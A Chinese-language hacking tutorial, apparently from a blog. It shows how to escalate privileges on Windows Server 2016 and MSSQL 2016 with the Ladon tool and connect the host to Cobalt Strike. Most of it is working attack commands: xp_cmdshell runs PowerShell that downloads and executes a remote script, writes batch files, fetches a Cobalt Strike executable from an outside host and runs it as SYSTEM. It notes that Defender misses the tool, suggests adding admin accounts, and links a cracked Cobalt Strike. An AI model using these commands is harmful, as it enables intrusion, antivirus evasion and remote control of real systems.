其他
Ladon提权Win2016/Win10/MSSQL2016上线CS
测试环境
Windows Server 2016
MSSQL: 13.0.1601.5
Microsoft Windows [Version 10.0.14393]
Ladon本地用户权限提权
网上找了些LPE,发现直接被Defender杀,病毒库更新至2021.1.19,Ladon没被杀,管理员UAC权限可通过BypassUac提权
MSSQL远程加载Ladon提权
执行SQL查询权限为network service
远程内存加载PowerLadon提权
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxxxx.800/Ladon.ps1''); Ladon SweetPotato "whoami""' |
ECHO写入BAT执行多行命令提权
exec master..xp_cmdshell 'echo whoami > c:\users\public\test.bat'
可ECHO写入添加管理员用户命令或者开3389等操作(举一反三不要只懂WHOAMI)
提权至SYSTEM权限执行BAT
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\test.bat""Wget下载Coblat Strkie的EXE
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon wget http://k8gege.org/cs.exe"'
提权至SYSTEM权限执行CS
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\cs.exe""'推荐文章
Cobalt Strike 3.12 3.13 4.3 4.4 K8破解版